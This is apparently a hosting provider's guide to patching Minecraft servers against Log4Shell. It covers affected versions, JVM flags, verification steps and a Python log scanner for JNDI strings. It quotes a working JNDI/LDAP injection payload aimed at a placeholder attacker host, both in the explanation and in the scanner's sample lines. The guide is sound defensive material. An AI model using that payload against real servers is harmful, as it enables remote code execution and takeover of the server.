# How to Protect Your Minecraft Server from the Log4j Vulnerability (/docs/minecraft/log4j-vulnerability)



The Log4j vulnerability (Log4Shell, CVE-2021-44228) was a critical security flaw discovered in December 2021 that affected Minecraft servers. It allowed attackers to execute arbitrary code by sending a specially crafted chat message.

Am I Affected? [#am-i-affected]

| Minecraft Version | Affected? | Fix                      |
| ----------------- | --------- | ------------------------ |
| 1.18.1+           | No        | Patched by Mojang        |
| 1.17–1.18         | Yes       | Update or apply JVM flag |
| 1.12–1.16.5       | Yes       | Apply JVM flag           |
| 1.7–1.11          | Partially | Apply JVM flag           |
| Below 1.7         | No        | Uses older Log4j         |

**If you're running Minecraft 1.18.1 or newer, you're already safe.** Mojang patched this in the official release.

Fixing the Vulnerability [#fixing-the-vulnerability]

<div className="fd-steps">
  <div className="fd-step">
    Update to the latest version (recommended) [#1-update-to-the-latest-version-recommended]

    The simplest fix is updating to Minecraft 1.18.1 or later. Update your server JAR through `Software Version` on the [XGamingServer panel](https://panel.xgamingserver.com).
  </div>

  <div className="fd-step">
    Apply the JVM flag (for older versions) [#2-apply-the-jvm-flag-for-older-versions]

    If you can't update, add this JVM flag in `Startup`:

    For Minecraft 1.12–1.18:

    ```
    -Dlog4j2.formatMsgNoLookups=true
    ```

    For Minecraft 1.7–1.11, you need a patched Log4j configuration file. Download the official fix from Mojang and add:

    ```
    -Dlog4j.configurationFile=log4j2_17-111.xml
    ```
  </div>

  <div className="fd-step">
    Update Paper/Spigot [#3-update-paperspigot]

    If you're running Paper or Spigot, update to the latest build for your Minecraft version. Both projects released patches shortly after the vulnerability was disclosed.
  </div>

  <div className="fd-step">
    Restart the server [#4-restart-the-server]

    Restart from `Console` for the fix to take effect.
  </div>
</div>

How the Exploit Worked [#how-the-exploit-worked]

An attacker could send a chat message like:

```
${jndi:ldap://attacker-server.com/exploit}
```

The Log4j library would process this string, connect to the attacker's server, download malicious code, and execute it — giving the attacker full control of the server machine.

Verifying the Fix [#verifying-the-fix]

After applying the fix:

1. Check your server's Java version — Java 17+ includes the Log4j fix
2. Verify the JVM flag is active in `Console` startup output
3. Test with a Log4j scanner (search "Log4Shell scanner" for safe testing tools)

Additional Security Measures [#additional-security-measures]

* Keep your server software updated
* Use a firewall to restrict outbound connections from the server
* Monitor server logs for suspicious `${jndi:` strings
* Use [server logs](/docs/minecraft/find-share-server-logs) to check for past exploitation attempts
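
The log check from the list above, as an added example (not part of the original guide or XGamingServer's tooling): a Python scanner that flags `${jndi:` case-insensitively, plus any lookup nested inside another lookup, across `latest.log` and rotated `.log.gz` files. The log line layout, the file naming and the sample lines are assumptions constructed for illustration.

```python
import gzip
import re
from pathlib import Path

# Lookup prefix from the exploit string shown on this page, matched case-insensitively.
JNDI_RE = re.compile(r"\$\{jndi:", re.IGNORECASE)
# A lookup nested inside another lookup can hide the literal text; flag for manual review.
NESTED_RE = re.compile(r"\$\{[^}]*\$\{")
# Assumed vanilla-style line layout: [HH:MM:SS] [thread/LEVEL]: <player> message
CHAT_RE = re.compile(r"^\[(\d{2}:\d{2}:\d{2})\] \[[^\]]*\]: (?:<([^>]+)> )?")

def classify(line):
    """Return 'jndi', 'nested-lookup', or None for a single log line."""
    if JNDI_RE.search(line):
        return "jndi"
    return "nested-lookup" if NESTED_RE.search(line) else None

def scan_lines(lines, source="<memory>"):
    """Return one dict per suspicious line, with time and player when parseable."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        kind = classify(line)
        if kind:
            m = CHAT_RE.match(line)
            time, player = m.groups() if m else (None, None)
            hits.append(dict(source=source, line=lineno, kind=kind, time=time, player=player))
    return hits

def scan_log_dir(log_dir):
    """Scan latest.log plus rotated *.log.gz files, which hold the older history."""
    hits = []
    for path in sorted(Path(log_dir).glob("*.log*")):
        opener = gzip.open if path.suffix == ".gz" else open
        with opener(path, "rt", encoding="utf-8", errors="replace") as fh:
            hits.extend(scan_lines(fh, source=path.name))
    return hits

# Constructed sample lines (not taken from a real server).
SAMPLE = [
    "[18:02:11] [Server thread/INFO]: <Steve> anyone want to trade?",
    "[18:02:40] [Server thread/INFO]: <Alex> ${jndi:ldap://attacker-server.com/exploit}",
    "[18:03:05] [Server thread/INFO]: <Alex> ${JNDI:ldap://attacker-server.com/exploit}",
    "[18:03:30] [Server thread/INFO]: <Alex> ${${nested}example}",
]

if __name__ == "__main__":
    for hit in scan_lines(SAMPLE):
        print(hit)
```

Point `scan_log_dir` at the server's `logs` folder; a `nested-lookup` hit is a prompt for manual review, not proof of an attempt.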

> ⚠️ **Warning:** If your server was running an unpatched version during December 2021–early 2022 and was publicly accessible, it may have been compromised. Check for unfamiliar files, plugins, or scheduled tasks.

> 📝 **Note:** XGamingServer applied protective measures across all servers during the initial disclosure. If you're hosting with us, your server was protected. This guide is primarily for awareness and for anyone running custom server JARs.

See also: [Find Server Logs](/docs/minecraft/find-share-server-logs) | [Server Types](/docs/minecraft/server-types-explained)

If you need help, join our [Discord](https://discord.xgamingserver.com/).
